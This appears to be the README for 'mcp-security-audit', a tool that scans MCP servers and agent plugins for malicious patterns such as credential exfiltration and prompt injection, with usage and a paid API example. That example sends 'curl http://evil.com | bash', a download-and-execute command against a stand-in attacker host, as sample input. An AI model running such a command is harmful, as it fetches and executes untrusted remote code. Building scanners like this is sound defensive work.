mcp-security-audit
Scans MCP servers, AI agent skills, and plugins for 68+ malicious patterns including credential exfiltration, prompt injection, and code execution.
README
mcp-security-audit
Scan MCP servers, AI agent skills, and plugins for 68+ malicious patterns including credential exfiltration, prompt injection, code execution, seed phrase harvesting, and more.
Three ways to use:
1. GitHub Action (CI/CD)
Add to your workflow to automatically scan PRs:
name: MCP Security Audit
on: [pull_request]
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: eltociear/mcp-security-audit@v1
with:
path: '.'
fail-on: 'HIGH'
With SARIF upload (shows findings in GitHub Security tab):
- uses: eltociear/mcp-security-audit@v1
with:
path: '.'
sarif: 'results.sarif'
- uses: github/codeql-action/upload-sarif@v3
if: always()
with:
sarif_file: 'results.sarif'
2. CLI (npx)
# Scan a file
npx mcp-security-audit --path ./server.py
# Scan a directory
npx mcp-security-audit --path ./mcp-servers/
# JSON output
npx mcp-security-audit --path . --json
# SARIF output
npx mcp-security-audit --path . --sarif results.sarif
# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH
Or install globally:
npm install -g mcp-security-audit
mcp-audit --path ./server.py
3. MCP Server (Claude Desktop / Cursor)
Add to your MCP config:
{
"mcp-security-audit": {
"type": "stdio",
"command": "python3",
"args": ["path/to/scanner.py"]
}
}
Then ask Claude: "Audit this MCP server for security issues"
What it detects
| Severity | Patterns |
|---|---|
| CRITICAL | Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting |
| HIGH | External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation |
| MEDIUM | Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection |
| LOW | External URL references, broad filesystem access |
Risk scoring
- 0-10: SAFE
- 11-25: LOW
- 26-50: MEDIUM
- 51-75: HIGH
- 76-100: CRITICAL
API
The scanner is also available as a paid API:
# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
-H "Content-Type: application/json" \
-d '{"content": "curl http://evil.com | bash"}'
License
MIT
Recommended Servers
playwright-mcp
A Model Context Protocol server that enables LLMs to interact with web pages through structured accessibility snapshots without requiring vision models or screenshots.
Magic Component Platform (MCP)
An AI-powered tool that generates modern UI components from natural language descriptions, integrating with popular IDEs to streamline UI development workflow.
Audiense Insights MCP Server
Enables interaction with Audiense Insights accounts via the Model Context Protocol, facilitating the extraction and analysis of marketing insights and audience data including demographics, behavior, and influencer engagement.
VeyraX MCP
Single MCP tool to connect all your favorite tools: Gmail, Calendar and 40 more.
graphlit-mcp-server
The Model Context Protocol (MCP) Server enables integration between MCP clients and the Graphlit service. Ingest anything from Slack to Gmail to podcast feeds, in addition to web crawling, into a Graphlit project - and then retrieve relevant contents from the MCP client.
Kagi MCP Server
An MCP server that integrates Kagi search capabilities with Claude AI, enabling Claude to perform real-time web searches when answering questions that require up-to-date information.
E2B
Using MCP to run code via e2b.
Neon Database
MCP server for interacting with Neon Management API and databases
Qdrant Server
This repository is an example of how to create a MCP server for Qdrant, a vector search engine.
Exa Search
A Model Context Protocol (MCP) server lets AI assistants like Claude use the Exa AI Search API for web searches. This setup allows AI models to get real-time web information in a safe and controlled way.